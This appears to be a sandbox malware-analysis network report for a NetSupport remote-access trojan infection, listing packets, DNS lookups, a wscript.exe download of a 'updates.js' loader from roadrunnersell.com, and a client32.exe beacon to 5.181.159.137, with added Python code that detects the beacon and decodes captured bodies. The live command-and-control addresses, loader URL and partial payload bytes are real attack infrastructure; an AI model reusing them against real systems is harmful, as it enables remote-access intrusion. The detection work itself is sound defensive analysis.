                                                                              Sep 25, 2024 19:02:37.656634092 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.656649113 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.656718969 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.657310963 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.657325983 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.657397032 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.657411098 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.657479048 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.658199072 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.658214092 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.658289909 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.658303976 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.658375025 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.659061909 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.659079075 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.659157991 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.659172058 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.659236908 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.659849882 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.659864902 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.659960032 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.659974098 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.660039902 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.660604000 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.660619974 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.660696983 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.660726070 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.660790920 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.661448002 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.661463022 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.661536932 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.661550999 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.709605932 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.709774971 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.709789991 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.709861994 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.709876060 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.709945917 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.710113049 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.710127115 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.710201979 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.710215092 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.710279942 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.710838079 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.710853100 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.710956097 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.710969925 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.711035967 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.713057041 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.713071108 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.713150978 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.713165045 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.713232040 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.714355946 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.714397907 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.714437962 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.714449883 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.714469910 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.714487076 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.714549065 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.717644930 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:39.597353935 CEST49706443192.168.2.165.181.159.137
                                                                              Sep 25, 2024 19:02:39.597414970 CEST443497065.181.159.137192.168.2.16
                                                                              Sep 25, 2024 19:02:39.597516060 CEST49706443192.168.2.165.181.159.137
                                                                              Sep 25, 2024 19:02:41.192086935 CEST49706443192.168.2.165.181.159.137
                                                                              Sep 25, 2024 19:02:41.192126989 CEST443497065.181.159.137192.168.2.16
                                                                              Sep 25, 2024 19:02:41.192193985 CEST443497065.181.159.137192.168.2.16
                                                                              Sep 25, 2024 19:02:45.084852934 CEST4970780192.168.2.16104.26.1.231
                                                                              Sep 25, 2024 19:02:45.091741085 CEST8049707104.26.1.231192.168.2.16
                                                                              Sep 25, 2024 19:02:45.091878891 CEST4970780192.168.2.16104.26.1.231
                                                                              Sep 25, 2024 19:02:45.093050957 CEST4970780192.168.2.16104.26.1.231
                                                                              Sep 25, 2024 19:02:45.098026037 CEST8049707104.26.1.231192.168.2.16
                                                                              Sep 25, 2024 19:02:45.838002920 CEST8049707104.26.1.231192.168.2.16
                                                                              Sep 25, 2024 19:02:45.838260889 CEST4970780192.168.2.16104.26.1.231
                                                                              Sep 25, 2024 19:02:48.493707895 CEST49709443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:48.493809938 CEST4434970979.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:48.493937016 CEST49709443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:48.544842958 CEST49709443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:48.544888020 CEST4434970979.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:49.149912119 CEST4434970979.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:49.150012016 CEST49709443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:49.153981924 CEST49709443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:49.154012918 CEST4434970979.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:49.154297113 CEST4434970979.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:49.154364109 CEST49709443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:49.155967951 CEST49709443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:49.156296968 CEST49709443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:49.156332016 CEST4434970979.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:49.299979925 CEST4434970979.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:49.300029039 CEST4434970979.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:49.300096989 CEST49709443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:49.300163984 CEST49709443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:49.300204039 CEST49709443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:49.300256014 CEST4434970979.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:49.300283909 CEST49709443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:49.300334930 CEST49709443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:03:53.610150099 CEST49710443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:03:53.610250950 CEST4434971079.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:03:53.610358953 CEST49710443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:03:53.634903908 CEST49710443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:03:53.634948969 CEST4434971079.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:03:54.103105068 CEST4434971079.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:03:54.103279114 CEST49710443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:03:54.107994080 CEST49710443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:03:54.108026981 CEST4434971079.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:03:54.108515024 CEST4434971079.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:03:54.108577013 CEST49710443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:03:54.113015890 CEST49710443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:03:54.113353968 CEST49710443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:03:54.113404036 CEST4434971079.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:03:54.254369974 CEST4434971079.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:03:54.254441023 CEST49710443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:03:54.254472017 CEST4434971079.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:03:54.254503012 CEST4434971079.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:03:54.254548073 CEST49710443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:03:54.254548073 CEST49710443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:03:54.254548073 CEST49710443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:03:54.254576921 CEST4434971079.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:03:54.254628897 CEST49710443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:03:54.254628897 CEST49710443192.168.2.1679.141.163.131
                                                                               Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                               Sep 25, 2024 19:02:12.045872927 CEST | 49907 | 53 | 192.168.2.16 | 1.1.1.1
                                                                               Sep 25, 2024 19:02:12.066792965 CEST | 53 | 49907 | 1.1.1.1 | 192.168.2.16
                                                                               Sep 25, 2024 19:02:42.514621973 CEST | 51879 | 53 | 192.168.2.16 | 1.1.1.1
                                                                               Sep 25, 2024 19:02:42.526077986 CEST | 53 | 51879 | 1.1.1.1 | 192.168.2.16
                                                                               Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                                               Sep 25, 2024 19:02:12.045872927 CEST | 192.168.2.16 | 1.1.1.1 | 0x2cc6 | Standard query (0) | roadrunnersell.com | A (IP address) | IN (0x0001) | false
                                                                               Sep 25, 2024 19:02:42.514621973 CEST | 192.168.2.16 | 1.1.1.1 | 0x712d | Standard query (0) | geo.netsupportsoftware.com | A (IP address) | IN (0x0001) | false
                                                                               Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                                               Sep 25, 2024 19:02:12.066792965 CEST | 1.1.1.1 | 192.168.2.16 | 0x2cc6 | No error (0) | roadrunnersell.com | | 79.141.163.131 | A (IP address) | IN (0x0001) | false
                                                                               Sep 25, 2024 19:02:42.526077986 CEST | 1.1.1.1 | 192.168.2.16 | 0x712d | No error (0) | geo.netsupportsoftware.com | | 104.26.1.231 | A (IP address) | IN (0x0001) | false
                                                                               Sep 25, 2024 19:02:42.526077986 CEST | 1.1.1.1 | 192.168.2.16 | 0x712d | No error (0) | geo.netsupportsoftware.com | | 172.67.68.212 | A (IP address) | IN (0x0001) | false
                                                                               Sep 25, 2024 19:02:42.526077986 CEST | 1.1.1.1 | 192.168.2.16 | 0x712d | No error (0) | geo.netsupportsoftware.com | | 104.26.0.231 | A (IP address) | IN (0x0001) | false
                                                                              • roadrunnersell.com
                                                                               • 5.181.159.137 (HTTP POST with Connection: keep-alive; body CMD=POLL INFO=1 ACK=1)
                                                                              • geo.netsupportsoftware.com
                                                                               Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                               0 | 192.168.2.16 | 49706 | 5.181.159.137 | 443 | 3056 | C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe
                                                                               Timestamp | Bytes transferred | Direction | Data
                                                                               Sep 25, 2024 19:02:41.192086935 CEST | 218 | OUT | POST http://5.181.159.137/fakeurl.htm HTTP/1.1
                                                                               User-Agent: NetSupport Manager/1.3
                                                                               Content-Type: application/x-www-form-urlencoded
                                                                               Content-Length: 22
                                                                               Host: 5.181.159.137
                                                                               Connection: Keep-Alive
                                                                               CMD=POLL
                                                                               INFO=1
                                                                               ACK=1
                                                                               Data Raw:
                                                                               Data Ascii:
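The session above is the dropped NetSupport client's HTTP gateway keep-alive: an absolute-form POST to /fakeurl.htm with the User-Agent NetSupport Manager/1.3 and a CMD=POLL body. The Python below is an added example, not part of the Joe Sandbox report and not NetSupport's or the malware's code: it parses a raw HTTP request, returns the NetSupport-specific indicators it finds, and checks the declared Content-Length against the body actually received. The BEACON and GEO_LOOKUP samples are constructed from the headers shown on this page; the layout of the 22-byte beacon body (each of the three fields followed by a single LF, 9+7+6 bytes) is an assumption chosen because it is the only single-byte separator layout that matches the declared length. The BENIGN request is invented for contrast.

```python
"""Flag NetSupport Manager gateway beacons in raw HTTP requests (added example)."""
from __future__ import annotations

from dataclasses import dataclass
from urllib.parse import urlsplit


@dataclass
class HttpRequest:
    method: str
    target: str
    headers: dict[str, str]   # header names lower-cased
    body: bytes


def parse_request(raw: bytes) -> HttpRequest:
    """Split one HTTP/1.x request into request line, headers and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers: dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return HttpRequest(method, target, headers, body)


# Values taken from the sessions shown in the report.
NETSUPPORT_UA_PREFIX = "netsupport manager/"
GATEWAY_PATH = "/fakeurl.htm"
GEO_HOST = "geo.netsupportsoftware.com"


def netsupport_indicators(raw: bytes) -> list[str]:
    """Return the NetSupport-related indicators found in one request."""
    req = parse_request(raw)
    hits: list[str] = []

    ua = req.headers.get("user-agent", "")
    if ua.lower().startswith(NETSUPPORT_UA_PREFIX):
        hits.append(f"user-agent: {ua}")

    # The gateway request uses an absolute-form target (http://host/fakeurl.htm);
    # urlsplit yields the path for both that and an origin-form target.
    if urlsplit(req.target).path == GATEWAY_PATH:
        hits.append(f"gateway path: {GATEWAY_PATH}")

    if req.method == "POST" and req.body.startswith(b"CMD=POLL"):
        hits.append("body: CMD=POLL keep-alive")

    if req.headers.get("host", "").lower() == GEO_HOST:
        hits.append(f"host: {GEO_HOST} (client geolocation lookup)")

    # A mismatch means the capture is truncated or the client lied about the length.
    declared = req.headers.get("content-length")
    if declared is not None and int(declared) != len(req.body):
        hits.append(f"content-length {declared} != {len(req.body)} bytes received")
    return hits


# Constructed samples. BEACON reproduces the headers from the report; its body
# layout (one LF after each field) is an assumption that matches Content-Length: 22.
BEACON = (
    b"POST http://5.181.159.137/fakeurl.htm HTTP/1.1\r\n"
    b"User-Agent: NetSupport Manager/1.3\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Length: 22\r\n"
    b"Host: 5.181.159.137\r\n"
    b"Connection: Keep-Alive\r\n"
    b"\r\n"
    b"CMD=POLL\nINFO=1\nACK=1\n"
)
GEO_LOOKUP = (
    b"GET /location/loca.asp HTTP/1.1\r\n"
    b"Host: geo.netsupportsoftware.com\r\n"
    b"Connection: Keep-Alive\r\n"
    b"Cache-Control: no-cache\r\n"
    b"\r\n"
)
BENIGN = (  # invented request, not from the report
    b"GET /index.html HTTP/1.1\r\n"
    b"Host: www.example.com\r\n"
    b"User-Agent: Mozilla/5.0\r\n"
    b"\r\n"
)

if __name__ == "__main__":
    for name, sample in (("beacon", BEACON), ("geo", GEO_LOOKUP), ("benign", BENIGN)):
        print(name, netsupport_indicators(sample))
```

The geolocation lookup is listed as its own indicator because it is legitimate NetSupport behaviour that also occurs in licensed deployments; on its own it is a weak signal, while the User-Agent plus /fakeurl.htm plus CMD=POLL combination from an unexpected process path is the strong one.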


                                                                               Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                               1 | 192.168.2.16 | 49707 | 104.26.1.231 | 80
                                                                               Timestamp | Bytes transferred | Direction | Data
                                                                               Sep 25, 2024 19:02:45.093050957 CEST | 118 | OUT | GET /location/loca.asp HTTP/1.1
                                                                              Host: geo.netsupportsoftware.com
                                                                              Connection: Keep-Alive
                                                                              Cache-Control: no-cache
                                                                               Sep 25, 2024 19:02:45.838002920 CEST | 931 | IN | HTTP/1.1 200 OK
                                                                              Date: Wed, 25 Sep 2024 17:02:45 GMT
                                                                              Content-Type: text/html; Charset=utf-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: keep-alive
                                                                              CF-Ray: 8c8c956e7d6c42c9-EWR
                                                                              CF-Cache-Status: DYNAMIC
                                                                              Access-Control-Allow-Origin: *
                                                                              Cache-Control: private
                                                                              Set-Cookie: ASPSESSIONIDSQCTDCAQ=ODGLFFNBCNFIAOJGOBPEDGGM; path=/
                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                              Vary: Accept-Encoding
                                                                              cf-apo-via: origin,host
                                                                              Referrer-Policy: strict-origin-when-cross-origin
                                                                              X-Content-Type-Options: nosniff
                                                                              X-Frame-Options: SAMEORIGIN
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NKePRLi79EYdUrBNPnVpST0KL6FutXSdGHUMhPUpHy%2B7mEmwFkFPYYJJY1gwSGMk2R4KoHFXBY4fUOl5JYUxG4jPpwhR4LVUDD%2F38um2MN3VKnPH1A9tVBnyOMxTrEmIb8gv6VezFyzMfAzl"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              Data Raw: 31 30 0d 0a 34 30 2e 37 33 35 37 2c 2d 37 34 2e 31 37 32 34 0d 0a 30 0d 0a 0d 0a
                                                                               Data Ascii (chunked body, one chunk line per row): 10 / 40.7357,-74.1724 / 0
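The geolocation response above is sent with Transfer-Encoding: chunked, which is why the raw bytes read as a chunk-size line (10, hexadecimal for 16), the 16-byte payload 40.7357,-74.1724 and a terminating zero-length chunk. The Python below is an added example, not part of the Joe Sandbox report or of any NetSupport or Joe Sandbox tooling: it converts the report's Data Raw hex lines back to bytes, decodes chunked bodies, and generalises to Content-Length bodies such as the 2,292,504-byte updates.js download shown further down the page, reporting whether the captured fragments are complete. Both inputs are constructed from lines on this page; the updates.js sample deliberately keeps only the first 14 bytes of the first fragment so the truncation check has something to report.

```python
"""Reassemble and decode HTTP responses from Joe Sandbox 'Data Raw' hex lines (added example)."""
from __future__ import annotations

from dataclasses import dataclass


@dataclass
class DecodedResponse:
    status: str
    headers: dict[str, str]        # header names lower-cased
    body: bytes
    complete: bool                 # True when the whole body was captured
    declared_length: int | None    # Content-Length, when the response carried one


def hexdump_to_bytes(dump: str) -> bytes:
    """Turn one report 'Data Raw' line ('31 30 0d 0a ...') back into bytes."""
    return bytes.fromhex(dump.replace("Data Raw:", "").strip())


def decode_chunked(body: bytes) -> tuple[bytes, bool]:
    """Decode a chunked transfer-coding body.

    Returns the payload and a flag that is True only if the terminating
    zero-length chunk was present, so a cut-off capture is reported, not hidden."""
    out = bytearray()
    pos = 0
    while True:
        nl = body.find(b"\r\n", pos)
        if nl < 0:
            return bytes(out), False                      # truncated before a size line
        size = int(body[pos:nl].split(b";", 1)[0], 16)    # ignore chunk extensions
        pos = nl + 2
        if size == 0:
            return bytes(out), True                       # last-chunk; trailers ignored
        chunk = body[pos:pos + size]
        if len(chunk) < size:
            return bytes(out + chunk), False              # truncated mid-chunk
        out += chunk
        pos += size + 2                                   # skip the CRLF after the chunk


def decode_response(raw_head: str, body_dumps: list[str]) -> DecodedResponse:
    """raw_head: status line and headers as printed in the report, one per line.
    body_dumps: the IN-direction Data Raw lines for the session, in capture order."""
    lines = [line.strip() for line in raw_head.strip().splitlines()]
    status = lines[0]
    headers: dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    body = b"".join(hexdump_to_bytes(d) for d in body_dumps)

    if headers.get("transfer-encoding", "").lower() == "chunked":
        payload, complete = decode_chunked(body)
        return DecodedResponse(status, headers, payload, complete, None)

    declared = headers.get("content-length")
    if declared is None:
        # Connection: close framing; completeness cannot be verified from the bytes alone.
        return DecodedResponse(status, headers, body, False, None)
    n = int(declared)
    return DecodedResponse(status, headers, body, len(body) >= n, n)


# Constructed from the geo.netsupportsoftware.com session in the report (headers abridged).
GEO_HEAD = """HTTP/1.1 200 OK
Content-Type: text/html; Charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Server: cloudflare"""
GEO_BODY = ["Data Raw: 31 30 0d 0a 34 30 2e 37 33 35 37 2c 2d 37 34 2e 31 37 32 34 0d 0a 30 0d 0a 0d 0a"]

# Constructed from the roadrunnersell.com session; only the first 14 bytes of the
# first fragment are kept here on purpose, so the capture is incomplete.
JS_HEAD = """HTTP/1.1 200 OK
Content-Disposition: attachment; filename=updates.js
Content-Length: 2292504
Connection: close
Content-Type: application/octet-stream"""
JS_BODY = ["Data Raw: 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a"]

if __name__ == "__main__":
    for head, dumps in ((GEO_HEAD, GEO_BODY), (JS_HEAD, JS_BODY)):
        r = decode_response(head, dumps)
        print(r.status, "complete" if r.complete else "INCOMPLETE",
              len(r.body), "bytes:", r.body[:40])
```

Reassembling from the hex dumps rather than the Data Ascii column matters because the ASCII rendering drops the CR/LF framing bytes, which is exactly what turned the chunked body into the run-together string 1040.7357,-74.17240 on this page.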


                                                                               Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                               0 | 192.168.2.16 | 49704 | 79.141.163.131 | 443 | 3528 | C:\Windows\System32\wscript.exe
                                                                               Timestamp | Bytes transferred | Direction | Data
                                                                               2024-09-25 17:02:12 UTC | 384 | OUT | POST /trade/fix.php?532 HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-ch
                                                                              UA-CPU: AMD64
                                                                              Accept-Encoding: gzip, deflate
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                              Host: roadrunnersell.com
                                                                              Content-Length: 7
                                                                              Connection: Keep-Alive
                                                                              Cache-Control: no-cache
                                                                               2024-09-25 17:02:12 UTC | 7 | OUT | Data Raw: 31 31 41 58 41 51 3d
                                                                              Data Ascii: 11AXAQ=
                                                                               2024-09-25 17:02:12 UTC | 357 | IN | HTTP/1.1 200 OK
                                                                              Date: Wed, 25 Sep 2024 17:02:12 GMT
                                                                              Server: Apache/2.4.52 (Ubuntu)
                                                                              Content-Description: File Transfer
                                                                              Content-Disposition: attachment; filename=updates.js
                                                                              Content-Transfer-Encoding: binary
                                                                              Expires: 0
                                                                              Cache-Control: must-revalidate
                                                                              Pragma: public
                                                                              Content-Length: 2292504
                                                                              Connection: close
                                                                              Content-Type: application/octet-stream
                                                                               2024-09-25 17:02:12 UTC | 7835 | IN | Data Raw: 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 72 28 65 2c 20 6e 2c 20 74 29 20 7b 0a 20 20 20 20 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 6f 28 69 2c 20 66 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 21 6e 5b 69 5d 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 21 65 5b 69 5d 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 63 20 3d 20 22 66 75 6e 63 74 69 6f 6e 22 20 3d 3d 20 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 20 26 26 20 72 65 71 75 69 72 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 21 66 20 26 26 20 63 29 20 72 65 74 75 72 6e 20 63 28 69 2c 20 21 30 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                              Data Ascii: (function() { function r(e, n, t) { function o(i, f) { if (!n[i]) { if (!e[i]) { var c = "function" == typeof require && require; if (!f && c) return c(i, !0);
                                                                               2024-09-25 17:02:13 UTC | 16384 | IN | Data Raw: 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 21 31 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 7d 0a 20 20 20 20 72 65 74 75 72 6e 20 6e 75 6c 6c 0a 7d 2c 20 22 65 73 36 22 29 3b 0a 65 2e 66 69 6e 64 49 6e 74 65 72 6e 61 6c 20 3d 20 66 75 6e 63 74 69 6f 6e 28 61 2c 20 62 2c 20 63 29 20 7b 0a 20 20 20 20 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 53 74 72 69 6e 67 20 26 26 20 28 61 20 3d 20 53 74 72 69 6e 67 28 61 29 29 3b 0a 20 20 20 20 66 6f 72 20 28 76 61 72 20 66 20 3d 20 61 2e 6c 65 6e 67 74 68 2c 20 67 20 3d 20 30 3b 20 67 20 3c 20 66 3b 20 67 2b 2b 29 20 7b 0a 20 20 20 20 20 20 20 20 76 61 72 20 68 20 3d 20 61 5b 67 5d 3b 0a 20 20 20 20 20 20 20 20 69 66 20 28 62 2e 63 61 6c 6c 28 63 2c 20 68 2c 20 67 2c 20 61 29
                                                                              Data Ascii: return !1 } } } return null}, "es6");e.findInternal = function(a, b, c) { a instanceof String && (a = String(a)); for (var f = a.length, g = 0; g < f; g++) { var h = a[g]; if (b.call(c, h, g, a)
                                                                               2024-09-25 17:02:13 UTC | 16384 | IN | Data Raw: 62 0a 7d 3b 0a 6b 2e 63 72 61 77 20 3d 20 7b 7d 3b 0a 76 61 72 20 61 61 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 7d 3b 0a 61 61 2e 70 72 6f 74 6f 74 79 70 65 2e 67 65 74 57 69 6e 64 6f 77 42 6f 75 6e 64 73 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 7d 3b 0a 61 61 2e 69 6d 70 6c 5f 20 3d 20 61 61 3b 0a 6b 2e 63 72 61 77 2e 41 70 70 42 61 63 6b 67 72 6f 75 6e 64 44 65 6c 65 67 61 74 65 20 3d 20 61 61 3b 0a 76 61 72 20 63 61 20 3d 20 66 75 6e 63 74 69 6f 6e 28 61 2c 20 62 29 20 7b 0a 20 20 20 20 74 68 69 73 2e 75 72 6c 5f 20 3d 20 61 3b 0a 20 20 20 20 74 68 69 73 2e 75 73 65 41 75 74 68 5f 20 3d 20 62 0a 7d 3b 0a 63 61 2e 70 72 6f 74 6f 74 79 70 65 2e 67 65 74 55 72 6c 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 72 65 74 75 72 6e 20 74
                                                                              Data Ascii: b};k.craw = {};var aa = function() {};aa.prototype.getWindowBounds = function() {};aa.impl_ = aa;k.craw.AppBackgroundDelegate = aa;var ca = function(a, b) { this.url_ = a; this.useAuth_ = b};ca.prototype.getUrl = function() { return t
